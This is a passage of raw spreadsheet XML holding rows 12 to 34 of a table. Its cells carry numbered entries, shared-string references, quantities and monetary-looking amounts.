      <c r="Y12" s="97"/>
      <c r="Z12" s="97"/>
      <c r="AA12" s="97"/>
      <c r="AB12" s="97"/>
      <c r="AC12" s="97"/>
      <c r="AD12" s="97"/>
      <c r="AE12" s="97"/>
      <c r="AF12" s="97"/>
    </row>
    <row r="13" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A13" s="93"/>
      <c r="B13" s="88">
        <v>7</v>
      </c>
      <c r="C13" s="243" t="s">
        <v>3929</v>
      </c>
      <c r="D13" s="256" t="s">
        <v>3930</v>
      </c>
      <c r="E13" s="243" t="s">
        <v>3931</v>
      </c>
      <c r="F13" s="89"/>
      <c r="G13" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H13" s="94">
        <v>2</v>
      </c>
      <c r="I13" s="243" t="s">
        <v>229</v>
      </c>
      <c r="J13" s="98">
        <v>110000</v>
      </c>
      <c r="K13" s="99">
        <v>18480</v>
      </c>
      <c r="L13" s="256" t="s">
        <v>3932</v>
      </c>
      <c r="M13" s="97"/>
      <c r="N13" s="97"/>
      <c r="O13" s="97"/>
      <c r="P13" s="97"/>
      <c r="Q13" s="97"/>
      <c r="R13" s="97"/>
      <c r="S13" s="97"/>
      <c r="T13" s="97"/>
      <c r="U13" s="97"/>
      <c r="V13" s="97"/>
      <c r="W13" s="97"/>
      <c r="X13" s="97"/>
      <c r="Y13" s="97"/>
      <c r="Z13" s="97"/>
      <c r="AA13" s="97"/>
      <c r="AB13" s="97"/>
      <c r="AC13" s="97"/>
      <c r="AD13" s="97"/>
      <c r="AE13" s="97"/>
      <c r="AF13" s="97"/>
    </row>
    <row r="14" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A14" s="93"/>
      <c r="B14" s="88">
        <v>8</v>
      </c>
      <c r="C14" s="243" t="s">
        <v>3933</v>
      </c>
      <c r="D14" s="256" t="s">
        <v>2905</v>
      </c>
      <c r="E14" s="243" t="s">
        <v>3934</v>
      </c>
      <c r="F14" s="89"/>
      <c r="G14" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H14" s="94">
        <v>2</v>
      </c>
      <c r="I14" s="243" t="s">
        <v>229</v>
      </c>
      <c r="J14" s="98">
        <v>3272296.9</v>
      </c>
      <c r="K14" s="99">
        <v>549729.6</v>
      </c>
      <c r="L14" s="256" t="s">
        <v>3935</v>
      </c>
      <c r="M14" s="97"/>
      <c r="N14" s="97"/>
      <c r="O14" s="97"/>
      <c r="P14" s="97"/>
      <c r="Q14" s="97"/>
      <c r="R14" s="97"/>
      <c r="S14" s="97"/>
      <c r="T14" s="97"/>
      <c r="U14" s="97"/>
      <c r="V14" s="97"/>
      <c r="W14" s="97"/>
      <c r="X14" s="97"/>
      <c r="Y14" s="97"/>
      <c r="Z14" s="97"/>
      <c r="AA14" s="97"/>
      <c r="AB14" s="97"/>
      <c r="AC14" s="97"/>
      <c r="AD14" s="97"/>
      <c r="AE14" s="97"/>
      <c r="AF14" s="97"/>
    </row>
    <row r="15" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A15" s="93"/>
      <c r="B15" s="88">
        <v>9</v>
      </c>
      <c r="C15" s="243" t="s">
        <v>3936</v>
      </c>
      <c r="D15" s="256" t="s">
        <v>3937</v>
      </c>
      <c r="E15" s="243" t="s">
        <v>3938</v>
      </c>
      <c r="F15" s="89"/>
      <c r="G15" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H15" s="94">
        <v>4</v>
      </c>
      <c r="I15" s="243" t="s">
        <v>229</v>
      </c>
      <c r="J15" s="98">
        <v>232000</v>
      </c>
      <c r="K15" s="99">
        <v>9280</v>
      </c>
      <c r="L15" s="256" t="s">
        <v>3935</v>
      </c>
      <c r="M15" s="97"/>
      <c r="N15" s="97"/>
      <c r="O15" s="97"/>
      <c r="P15" s="97"/>
      <c r="Q15" s="97"/>
      <c r="R15" s="97"/>
      <c r="S15" s="97"/>
      <c r="T15" s="97"/>
      <c r="U15" s="97"/>
      <c r="V15" s="97"/>
      <c r="W15" s="97"/>
      <c r="X15" s="97"/>
      <c r="Y15" s="97"/>
      <c r="Z15" s="97"/>
      <c r="AA15" s="97"/>
      <c r="AB15" s="97"/>
      <c r="AC15" s="97"/>
      <c r="AD15" s="97"/>
      <c r="AE15" s="97"/>
      <c r="AF15" s="97"/>
    </row>
    <row r="16" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A16" s="93"/>
      <c r="B16" s="88">
        <v>10</v>
      </c>
      <c r="C16" s="243" t="s">
        <v>3939</v>
      </c>
      <c r="D16" s="256" t="s">
        <v>3155</v>
      </c>
      <c r="E16" s="243" t="s">
        <v>3940</v>
      </c>
      <c r="F16" s="89"/>
      <c r="G16" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H16" s="94">
        <v>2</v>
      </c>
      <c r="I16" s="243" t="s">
        <v>229</v>
      </c>
      <c r="J16" s="98">
        <v>146000</v>
      </c>
      <c r="K16" s="99">
        <v>24528</v>
      </c>
      <c r="L16" s="256" t="s">
        <v>3935</v>
      </c>
      <c r="M16" s="97"/>
      <c r="N16" s="97"/>
      <c r="O16" s="97"/>
      <c r="P16" s="97"/>
      <c r="Q16" s="97"/>
      <c r="R16" s="97"/>
      <c r="S16" s="97"/>
      <c r="T16" s="97"/>
      <c r="U16" s="97"/>
      <c r="V16" s="97"/>
      <c r="W16" s="97"/>
      <c r="X16" s="97"/>
      <c r="Y16" s="97"/>
      <c r="Z16" s="97"/>
      <c r="AA16" s="97"/>
      <c r="AB16" s="97"/>
      <c r="AC16" s="97"/>
      <c r="AD16" s="97"/>
      <c r="AE16" s="97"/>
      <c r="AF16" s="97"/>
    </row>
    <row r="17" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A17" s="93"/>
      <c r="B17" s="88">
        <v>11</v>
      </c>
      <c r="C17" s="243" t="s">
        <v>3941</v>
      </c>
      <c r="D17" s="256" t="s">
        <v>3942</v>
      </c>
      <c r="E17" s="243" t="s">
        <v>3943</v>
      </c>
      <c r="F17" s="89"/>
      <c r="G17" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H17" s="94">
        <v>1</v>
      </c>
      <c r="I17" s="243" t="s">
        <v>229</v>
      </c>
      <c r="J17" s="98">
        <v>15000</v>
      </c>
      <c r="K17" s="99">
        <v>600</v>
      </c>
      <c r="L17" s="256" t="s">
        <v>3935</v>
      </c>
      <c r="M17" s="97"/>
      <c r="N17" s="97"/>
      <c r="O17" s="97"/>
      <c r="P17" s="97"/>
      <c r="Q17" s="97"/>
      <c r="R17" s="97"/>
      <c r="S17" s="97"/>
      <c r="T17" s="97"/>
      <c r="U17" s="97"/>
      <c r="V17" s="97"/>
      <c r="W17" s="97"/>
      <c r="X17" s="97"/>
      <c r="Y17" s="97"/>
      <c r="Z17" s="97"/>
      <c r="AA17" s="97"/>
      <c r="AB17" s="97"/>
      <c r="AC17" s="97"/>
      <c r="AD17" s="97"/>
      <c r="AE17" s="97"/>
      <c r="AF17" s="97"/>
    </row>
    <row r="18" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A18" s="93"/>
      <c r="B18" s="88">
        <v>12</v>
      </c>
      <c r="C18" s="243" t="s">
        <v>3944</v>
      </c>
      <c r="D18" s="256" t="s">
        <v>3945</v>
      </c>
      <c r="E18" s="243" t="s">
        <v>3946</v>
      </c>
      <c r="F18" s="89"/>
      <c r="G18" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H18" s="94">
        <v>1</v>
      </c>
      <c r="I18" s="243" t="s">
        <v>229</v>
      </c>
      <c r="J18" s="98">
        <v>11000</v>
      </c>
      <c r="K18" s="99">
        <v>440</v>
      </c>
      <c r="L18" s="256" t="s">
        <v>2043</v>
      </c>
      <c r="M18" s="97"/>
      <c r="N18" s="97"/>
      <c r="O18" s="97"/>
      <c r="P18" s="97"/>
      <c r="Q18" s="97"/>
      <c r="R18" s="97"/>
      <c r="S18" s="97"/>
      <c r="T18" s="97"/>
      <c r="U18" s="97"/>
      <c r="V18" s="97"/>
      <c r="W18" s="97"/>
      <c r="X18" s="97"/>
      <c r="Y18" s="97"/>
      <c r="Z18" s="97"/>
      <c r="AA18" s="97"/>
      <c r="AB18" s="97"/>
      <c r="AC18" s="97"/>
      <c r="AD18" s="97"/>
      <c r="AE18" s="97"/>
      <c r="AF18" s="97"/>
    </row>
    <row r="19" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A19" s="93"/>
      <c r="B19" s="88">
        <v>13</v>
      </c>
      <c r="C19" s="243" t="s">
        <v>3947</v>
      </c>
      <c r="D19" s="256" t="s">
        <v>3948</v>
      </c>
      <c r="E19" s="243" t="s">
        <v>3943</v>
      </c>
      <c r="F19" s="89"/>
      <c r="G19" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H19" s="94">
        <v>1</v>
      </c>
      <c r="I19" s="243" t="s">
        <v>229</v>
      </c>
      <c r="J19" s="98">
        <v>15000</v>
      </c>
      <c r="K19" s="99">
        <v>600</v>
      </c>
      <c r="L19" s="256" t="s">
        <v>3935</v>
      </c>
      <c r="M19" s="97"/>
      <c r="N19" s="97"/>
      <c r="O19" s="97"/>
      <c r="P19" s="97"/>
      <c r="Q19" s="97"/>
      <c r="R19" s="97"/>
      <c r="S19" s="97"/>
      <c r="T19" s="97"/>
      <c r="U19" s="97"/>
      <c r="V19" s="97"/>
      <c r="W19" s="97"/>
      <c r="X19" s="97"/>
      <c r="Y19" s="97"/>
      <c r="Z19" s="97"/>
      <c r="AA19" s="97"/>
      <c r="AB19" s="97"/>
      <c r="AC19" s="97"/>
      <c r="AD19" s="97"/>
      <c r="AE19" s="97"/>
      <c r="AF19" s="97"/>
    </row>
    <row r="20" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A20" s="93"/>
      <c r="B20" s="88">
        <v>14</v>
      </c>
      <c r="C20" s="237" t="s">
        <v>3949</v>
      </c>
      <c r="D20" s="239" t="s">
        <v>532</v>
      </c>
      <c r="E20" s="237" t="s">
        <v>3950</v>
      </c>
      <c r="F20" s="89"/>
      <c r="G20" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H20" s="11">
        <v>1</v>
      </c>
      <c r="I20" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J20" s="100">
        <v>10000</v>
      </c>
      <c r="K20" s="99">
        <v>0</v>
      </c>
      <c r="L20" s="239" t="s">
        <v>3918</v>
      </c>
      <c r="M20" s="97"/>
      <c r="N20" s="97"/>
      <c r="O20" s="97"/>
      <c r="P20" s="97"/>
      <c r="Q20" s="97"/>
      <c r="R20" s="97"/>
      <c r="S20" s="97"/>
      <c r="T20" s="97"/>
      <c r="U20" s="97"/>
      <c r="V20" s="97"/>
      <c r="W20" s="97"/>
      <c r="X20" s="97"/>
      <c r="Y20" s="97"/>
      <c r="Z20" s="97"/>
      <c r="AA20" s="97"/>
      <c r="AB20" s="97"/>
      <c r="AC20" s="97"/>
      <c r="AD20" s="97"/>
      <c r="AE20" s="97"/>
      <c r="AF20" s="97"/>
    </row>
    <row r="21" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A21" s="93"/>
      <c r="B21" s="88">
        <v>15</v>
      </c>
      <c r="C21" s="243" t="s">
        <v>3951</v>
      </c>
      <c r="D21" s="256" t="s">
        <v>3952</v>
      </c>
      <c r="E21" s="243" t="s">
        <v>3953</v>
      </c>
      <c r="F21" s="89"/>
      <c r="G21" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H21" s="94">
        <v>1</v>
      </c>
      <c r="I21" s="243" t="s">
        <v>229</v>
      </c>
      <c r="J21" s="98">
        <v>11000</v>
      </c>
      <c r="K21" s="99">
        <v>440</v>
      </c>
      <c r="L21" s="256" t="s">
        <v>3918</v>
      </c>
      <c r="M21" s="97"/>
      <c r="N21" s="97"/>
      <c r="O21" s="97"/>
      <c r="P21" s="97"/>
      <c r="Q21" s="97"/>
      <c r="R21" s="97"/>
      <c r="S21" s="97"/>
      <c r="T21" s="97"/>
      <c r="U21" s="97"/>
      <c r="V21" s="97"/>
      <c r="W21" s="97"/>
      <c r="X21" s="97"/>
      <c r="Y21" s="97"/>
      <c r="Z21" s="97"/>
      <c r="AA21" s="97"/>
      <c r="AB21" s="97"/>
      <c r="AC21" s="97"/>
      <c r="AD21" s="97"/>
      <c r="AE21" s="97"/>
      <c r="AF21" s="97"/>
    </row>
    <row r="22" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A22" s="93"/>
      <c r="B22" s="88">
        <v>16</v>
      </c>
      <c r="C22" s="243" t="s">
        <v>3954</v>
      </c>
      <c r="D22" s="256" t="s">
        <v>3955</v>
      </c>
      <c r="E22" s="243" t="s">
        <v>3956</v>
      </c>
      <c r="F22" s="89"/>
      <c r="G22" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H22" s="94">
        <v>1</v>
      </c>
      <c r="I22" s="243" t="s">
        <v>955</v>
      </c>
      <c r="J22" s="98">
        <v>745500</v>
      </c>
      <c r="K22" s="99">
        <v>143040</v>
      </c>
      <c r="L22" s="256" t="s">
        <v>3918</v>
      </c>
      <c r="M22" s="97"/>
      <c r="N22" s="97"/>
      <c r="O22" s="97"/>
      <c r="P22" s="97"/>
      <c r="Q22" s="97"/>
      <c r="R22" s="97"/>
      <c r="S22" s="97"/>
      <c r="T22" s="97"/>
      <c r="U22" s="97"/>
      <c r="V22" s="97"/>
      <c r="W22" s="97"/>
      <c r="X22" s="97"/>
      <c r="Y22" s="97"/>
      <c r="Z22" s="97"/>
      <c r="AA22" s="97"/>
      <c r="AB22" s="97"/>
      <c r="AC22" s="97"/>
      <c r="AD22" s="97"/>
      <c r="AE22" s="97"/>
      <c r="AF22" s="97"/>
    </row>
    <row r="23" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A23" s="93"/>
      <c r="B23" s="88">
        <v>17</v>
      </c>
      <c r="C23" s="243" t="s">
        <v>3957</v>
      </c>
      <c r="D23" s="256" t="s">
        <v>3958</v>
      </c>
      <c r="E23" s="243" t="s">
        <v>3959</v>
      </c>
      <c r="F23" s="89"/>
      <c r="G23" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H23" s="94">
        <v>2</v>
      </c>
      <c r="I23" s="243" t="s">
        <v>955</v>
      </c>
      <c r="J23" s="98">
        <v>7816</v>
      </c>
      <c r="K23" s="99">
        <v>1499.52</v>
      </c>
      <c r="L23" s="256" t="s">
        <v>3918</v>
      </c>
      <c r="M23" s="97"/>
      <c r="N23" s="97"/>
      <c r="O23" s="97"/>
      <c r="P23" s="97"/>
      <c r="Q23" s="97"/>
      <c r="R23" s="97"/>
      <c r="S23" s="97"/>
      <c r="T23" s="97"/>
      <c r="U23" s="97"/>
      <c r="V23" s="97"/>
      <c r="W23" s="97"/>
      <c r="X23" s="97"/>
      <c r="Y23" s="97"/>
      <c r="Z23" s="97"/>
      <c r="AA23" s="97"/>
      <c r="AB23" s="97"/>
      <c r="AC23" s="97"/>
      <c r="AD23" s="97"/>
      <c r="AE23" s="97"/>
      <c r="AF23" s="97"/>
    </row>
    <row r="24" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A24" s="93"/>
      <c r="B24" s="88">
        <v>18</v>
      </c>
      <c r="C24" s="243" t="s">
        <v>3960</v>
      </c>
      <c r="D24" s="256" t="s">
        <v>3961</v>
      </c>
      <c r="E24" s="243" t="s">
        <v>3962</v>
      </c>
      <c r="F24" s="89"/>
      <c r="G24" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H24" s="94">
        <v>2</v>
      </c>
      <c r="I24" s="243" t="s">
        <v>955</v>
      </c>
      <c r="J24" s="98">
        <v>9250</v>
      </c>
      <c r="K24" s="99">
        <v>1776</v>
      </c>
      <c r="L24" s="256" t="s">
        <v>3918</v>
      </c>
      <c r="M24" s="97"/>
      <c r="N24" s="97"/>
      <c r="O24" s="97"/>
      <c r="P24" s="97"/>
      <c r="Q24" s="97"/>
      <c r="R24" s="97"/>
      <c r="S24" s="97"/>
      <c r="T24" s="97"/>
      <c r="U24" s="97"/>
      <c r="V24" s="97"/>
      <c r="W24" s="97"/>
      <c r="X24" s="97"/>
      <c r="Y24" s="97"/>
      <c r="Z24" s="97"/>
      <c r="AA24" s="97"/>
      <c r="AB24" s="97"/>
      <c r="AC24" s="97"/>
      <c r="AD24" s="97"/>
      <c r="AE24" s="97"/>
      <c r="AF24" s="97"/>
    </row>
    <row r="25" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A25" s="93"/>
      <c r="B25" s="88">
        <v>19</v>
      </c>
      <c r="C25" s="243" t="s">
        <v>3963</v>
      </c>
      <c r="D25" s="256" t="s">
        <v>3964</v>
      </c>
      <c r="E25" s="243" t="s">
        <v>3965</v>
      </c>
      <c r="F25" s="89"/>
      <c r="G25" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H25" s="94">
        <v>2</v>
      </c>
      <c r="I25" s="243" t="s">
        <v>958</v>
      </c>
      <c r="J25" s="98">
        <v>7078</v>
      </c>
      <c r="K25" s="99">
        <v>1357.44</v>
      </c>
      <c r="L25" s="256" t="s">
        <v>3918</v>
      </c>
      <c r="M25" s="97"/>
      <c r="N25" s="97"/>
      <c r="O25" s="97"/>
      <c r="P25" s="97"/>
      <c r="Q25" s="97"/>
      <c r="R25" s="97"/>
      <c r="S25" s="97"/>
      <c r="T25" s="97"/>
      <c r="U25" s="97"/>
      <c r="V25" s="97"/>
      <c r="W25" s="97"/>
      <c r="X25" s="97"/>
      <c r="Y25" s="97"/>
      <c r="Z25" s="97"/>
      <c r="AA25" s="97"/>
      <c r="AB25" s="97"/>
      <c r="AC25" s="97"/>
      <c r="AD25" s="97"/>
      <c r="AE25" s="97"/>
      <c r="AF25" s="97"/>
    </row>
    <row r="26" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A26" s="93"/>
      <c r="B26" s="88">
        <v>20</v>
      </c>
      <c r="C26" s="243" t="s">
        <v>3966</v>
      </c>
      <c r="D26" s="256" t="s">
        <v>3967</v>
      </c>
      <c r="E26" s="243" t="s">
        <v>3968</v>
      </c>
      <c r="F26" s="89"/>
      <c r="G26" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H26" s="94">
        <v>2</v>
      </c>
      <c r="I26" s="243" t="s">
        <v>958</v>
      </c>
      <c r="J26" s="98">
        <v>4446</v>
      </c>
      <c r="K26" s="99">
        <v>852.48</v>
      </c>
      <c r="L26" s="256" t="s">
        <v>3918</v>
      </c>
      <c r="M26" s="97"/>
      <c r="N26" s="97"/>
      <c r="O26" s="97"/>
      <c r="P26" s="97"/>
      <c r="Q26" s="97"/>
      <c r="R26" s="97"/>
      <c r="S26" s="97"/>
      <c r="T26" s="97"/>
      <c r="U26" s="97"/>
      <c r="V26" s="97"/>
      <c r="W26" s="97"/>
      <c r="X26" s="97"/>
      <c r="Y26" s="97"/>
      <c r="Z26" s="97"/>
      <c r="AA26" s="97"/>
      <c r="AB26" s="97"/>
      <c r="AC26" s="97"/>
      <c r="AD26" s="97"/>
      <c r="AE26" s="97"/>
      <c r="AF26" s="97"/>
    </row>
    <row r="27" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A27" s="93"/>
      <c r="B27" s="88">
        <v>21</v>
      </c>
      <c r="C27" s="243" t="s">
        <v>3969</v>
      </c>
      <c r="D27" s="256" t="s">
        <v>3970</v>
      </c>
      <c r="E27" s="243" t="s">
        <v>3971</v>
      </c>
      <c r="F27" s="89"/>
      <c r="G27" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H27" s="94">
        <v>1</v>
      </c>
      <c r="I27" s="243" t="s">
        <v>958</v>
      </c>
      <c r="J27" s="98">
        <v>1635</v>
      </c>
      <c r="K27" s="99">
        <v>312.96</v>
      </c>
      <c r="L27" s="256" t="s">
        <v>3918</v>
      </c>
      <c r="M27" s="97"/>
      <c r="N27" s="97"/>
      <c r="O27" s="97"/>
      <c r="P27" s="97"/>
      <c r="Q27" s="97"/>
      <c r="R27" s="97"/>
      <c r="S27" s="97"/>
      <c r="T27" s="97"/>
      <c r="U27" s="97"/>
      <c r="V27" s="97"/>
      <c r="W27" s="97"/>
      <c r="X27" s="97"/>
      <c r="Y27" s="97"/>
      <c r="Z27" s="97"/>
      <c r="AA27" s="97"/>
      <c r="AB27" s="97"/>
      <c r="AC27" s="97"/>
      <c r="AD27" s="97"/>
      <c r="AE27" s="97"/>
      <c r="AF27" s="97"/>
    </row>
    <row r="28" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A28" s="93"/>
      <c r="B28" s="88">
        <v>22</v>
      </c>
      <c r="C28" s="243" t="s">
        <v>3972</v>
      </c>
      <c r="D28" s="256" t="s">
        <v>3973</v>
      </c>
      <c r="E28" s="243" t="s">
        <v>3974</v>
      </c>
      <c r="F28" s="89"/>
      <c r="G28" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H28" s="94">
        <v>2</v>
      </c>
      <c r="I28" s="243" t="s">
        <v>958</v>
      </c>
      <c r="J28" s="98">
        <v>4190</v>
      </c>
      <c r="K28" s="99">
        <v>804.48</v>
      </c>
      <c r="L28" s="256" t="s">
        <v>3918</v>
      </c>
      <c r="M28" s="97"/>
      <c r="N28" s="97"/>
      <c r="O28" s="97"/>
      <c r="P28" s="97"/>
      <c r="Q28" s="97"/>
      <c r="R28" s="97"/>
      <c r="S28" s="97"/>
      <c r="T28" s="97"/>
      <c r="U28" s="97"/>
      <c r="V28" s="97"/>
      <c r="W28" s="97"/>
      <c r="X28" s="97"/>
      <c r="Y28" s="97"/>
      <c r="Z28" s="97"/>
      <c r="AA28" s="97"/>
      <c r="AB28" s="97"/>
      <c r="AC28" s="97"/>
      <c r="AD28" s="97"/>
      <c r="AE28" s="97"/>
      <c r="AF28" s="97"/>
    </row>
    <row r="29" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A29" s="93"/>
      <c r="B29" s="88">
        <v>23</v>
      </c>
      <c r="C29" s="243" t="s">
        <v>3975</v>
      </c>
      <c r="D29" s="256" t="s">
        <v>3976</v>
      </c>
      <c r="E29" s="243" t="s">
        <v>3977</v>
      </c>
      <c r="F29" s="89"/>
      <c r="G29" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H29" s="94">
        <v>2</v>
      </c>
      <c r="I29" s="243" t="s">
        <v>958</v>
      </c>
      <c r="J29" s="98">
        <v>3850</v>
      </c>
      <c r="K29" s="99">
        <v>739.2</v>
      </c>
      <c r="L29" s="256" t="s">
        <v>3918</v>
      </c>
      <c r="M29" s="97"/>
      <c r="N29" s="97"/>
      <c r="O29" s="97"/>
      <c r="P29" s="97"/>
      <c r="Q29" s="97"/>
      <c r="R29" s="97"/>
      <c r="S29" s="97"/>
      <c r="T29" s="97"/>
      <c r="U29" s="97"/>
      <c r="V29" s="97"/>
      <c r="W29" s="97"/>
      <c r="X29" s="97"/>
      <c r="Y29" s="97"/>
      <c r="Z29" s="97"/>
      <c r="AA29" s="97"/>
      <c r="AB29" s="97"/>
      <c r="AC29" s="97"/>
      <c r="AD29" s="97"/>
      <c r="AE29" s="97"/>
      <c r="AF29" s="97"/>
    </row>
    <row r="30" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A30" s="93"/>
      <c r="B30" s="88">
        <v>24</v>
      </c>
      <c r="C30" s="243" t="s">
        <v>3978</v>
      </c>
      <c r="D30" s="256" t="s">
        <v>3979</v>
      </c>
      <c r="E30" s="243" t="s">
        <v>3980</v>
      </c>
      <c r="F30" s="89"/>
      <c r="G30" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H30" s="94">
        <v>1</v>
      </c>
      <c r="I30" s="243" t="s">
        <v>958</v>
      </c>
      <c r="J30" s="98">
        <v>282700</v>
      </c>
      <c r="K30" s="99">
        <v>54278.4</v>
      </c>
      <c r="L30" s="256" t="s">
        <v>3918</v>
      </c>
      <c r="M30" s="97"/>
      <c r="N30" s="97"/>
      <c r="O30" s="97"/>
      <c r="P30" s="97"/>
      <c r="Q30" s="97"/>
      <c r="R30" s="97"/>
      <c r="S30" s="97"/>
      <c r="T30" s="97"/>
      <c r="U30" s="97"/>
      <c r="V30" s="97"/>
      <c r="W30" s="97"/>
      <c r="X30" s="97"/>
      <c r="Y30" s="97"/>
      <c r="Z30" s="97"/>
      <c r="AA30" s="97"/>
      <c r="AB30" s="97"/>
      <c r="AC30" s="97"/>
      <c r="AD30" s="97"/>
      <c r="AE30" s="97"/>
      <c r="AF30" s="97"/>
    </row>
    <row r="31" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A31" s="93"/>
      <c r="B31" s="88">
        <v>25</v>
      </c>
      <c r="C31" s="243" t="s">
        <v>3981</v>
      </c>
      <c r="D31" s="256" t="s">
        <v>2798</v>
      </c>
      <c r="E31" s="243" t="s">
        <v>3982</v>
      </c>
      <c r="F31" s="89"/>
      <c r="G31" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H31" s="94">
        <v>1</v>
      </c>
      <c r="I31" s="243" t="s">
        <v>958</v>
      </c>
      <c r="J31" s="98">
        <v>539558.5</v>
      </c>
      <c r="K31" s="99">
        <v>103584</v>
      </c>
      <c r="L31" s="256" t="s">
        <v>3983</v>
      </c>
      <c r="M31" s="97"/>
      <c r="N31" s="97"/>
      <c r="O31" s="97"/>
      <c r="P31" s="97"/>
      <c r="Q31" s="97"/>
      <c r="R31" s="97"/>
      <c r="S31" s="97"/>
      <c r="T31" s="97"/>
      <c r="U31" s="97"/>
      <c r="V31" s="97"/>
      <c r="W31" s="97"/>
      <c r="X31" s="97"/>
      <c r="Y31" s="97"/>
      <c r="Z31" s="97"/>
      <c r="AA31" s="97"/>
      <c r="AB31" s="97"/>
      <c r="AC31" s="97"/>
      <c r="AD31" s="97"/>
      <c r="AE31" s="97"/>
      <c r="AF31" s="97"/>
    </row>
    <row r="32" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A32" s="93"/>
      <c r="B32" s="88">
        <v>26</v>
      </c>
      <c r="C32" s="243" t="s">
        <v>3984</v>
      </c>
      <c r="D32" s="256" t="s">
        <v>2798</v>
      </c>
      <c r="E32" s="243" t="s">
        <v>3985</v>
      </c>
      <c r="F32" s="89"/>
      <c r="G32" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H32" s="94">
        <v>1</v>
      </c>
      <c r="I32" s="243" t="s">
        <v>958</v>
      </c>
      <c r="J32" s="98">
        <v>589558.5</v>
      </c>
      <c r="K32" s="99">
        <v>113184</v>
      </c>
      <c r="L32" s="256" t="s">
        <v>3983</v>
      </c>
      <c r="M32" s="97"/>
      <c r="N32" s="97"/>
      <c r="O32" s="97"/>
      <c r="P32" s="97"/>
      <c r="Q32" s="97"/>
      <c r="R32" s="97"/>
      <c r="S32" s="97"/>
      <c r="T32" s="97"/>
      <c r="U32" s="97"/>
      <c r="V32" s="97"/>
      <c r="W32" s="97"/>
      <c r="X32" s="97"/>
      <c r="Y32" s="97"/>
      <c r="Z32" s="97"/>
      <c r="AA32" s="97"/>
      <c r="AB32" s="97"/>
      <c r="AC32" s="97"/>
      <c r="AD32" s="97"/>
      <c r="AE32" s="97"/>
      <c r="AF32" s="97"/>
    </row>
    <row r="33" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A33" s="93"/>
      <c r="B33" s="88">
        <v>27</v>
      </c>
      <c r="C33" s="243" t="s">
        <v>3986</v>
      </c>
      <c r="D33" s="256" t="s">
        <v>3987</v>
      </c>
      <c r="E33" s="243" t="s">
        <v>3988</v>
      </c>
      <c r="F33" s="89"/>
      <c r="G33" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H33" s="94">
        <v>1</v>
      </c>
      <c r="I33" s="243" t="s">
        <v>958</v>
      </c>
      <c r="J33" s="98">
        <v>540000</v>
      </c>
      <c r="K33" s="99">
        <v>103680</v>
      </c>
      <c r="L33" s="256" t="s">
        <v>3983</v>
      </c>
      <c r="M33" s="97"/>
      <c r="N33" s="97"/>
      <c r="O33" s="97"/>
      <c r="P33" s="97"/>
      <c r="Q33" s="97"/>
      <c r="R33" s="97"/>
      <c r="S33" s="97"/>
      <c r="T33" s="97"/>
      <c r="U33" s="97"/>
      <c r="V33" s="97"/>
      <c r="W33" s="97"/>
      <c r="X33" s="97"/>
      <c r="Y33" s="97"/>
      <c r="Z33" s="97"/>
      <c r="AA33" s="97"/>
      <c r="AB33" s="97"/>
      <c r="AC33" s="97"/>
      <c r="AD33" s="97"/>
      <c r="AE33" s="97"/>
      <c r="AF33" s="97"/>
    </row>
    <row r="34" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A34" s="93"/>
      <c r="B34" s="88">
        <v>28</v>
      </c>
      <c r="C34" s="243" t="s">
        <v>3989</v>
      </c>
      <c r="D34" s="256" t="s">
        <v>3990</v>
      </c>
      <c r="E34" s="243" t="s">
        <v>3991</v>
      </c>
      <c r="F34" s="89"/>
      <c r="G34" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H34" s="94">
        <v>1</v>
      </c>
      <c r="I34" s="243" t="s">
        <v>958</v>
      </c>
      <c r="J34" s="98">
        <v>554446.72</v>
      </c>
      <c r="K34" s="99">
        <v>106444.8</v>
      </c>
      <c r="L34" s="256" t="s">
        <v>3983</v>
      </c>
      <c r="M34" s="97"/>
      <c r="N34" s="97"/>
      <c r="O34" s="97"/>
      <c r="P34" s="97"/>
      <c r="Q34" s="97"/>
      <c r="R34" s="97"/>
      <c r="S34" s="97"/>
      <c r="T34" s="97"/>
      <c r="U34" s="97"/>
      <c r="V34" s="97"/>
      <c r="W34" s="97"/>
      <c r="X34" s="97"/>
      <c r="Y34" s="97"/>
      <c r="Z34" s="97"/>
      <c r="AA34" s="97"/>
      <c r="AB34" s="97"/>
      <c r="AC34" s="97"/>
